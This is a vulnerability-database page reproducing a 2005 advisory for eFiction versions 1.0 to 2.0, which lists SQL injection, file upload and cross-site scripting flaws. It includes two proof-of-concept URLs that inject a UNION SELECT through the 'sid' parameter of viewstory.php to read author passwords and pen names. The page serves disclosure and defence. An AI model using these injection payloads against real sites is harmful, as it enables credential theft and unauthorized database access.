Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2005-4169

Publish Date: 25 Nov 2005

                							

                source: http://www.securityfocus.com/bid/15568/info
  
eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities.
  
These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.
  
eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected. 

http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

efiction 1.0/1.1/2.0 - 'sid' SQL Injection

Vulmon Search

About

Products

Connect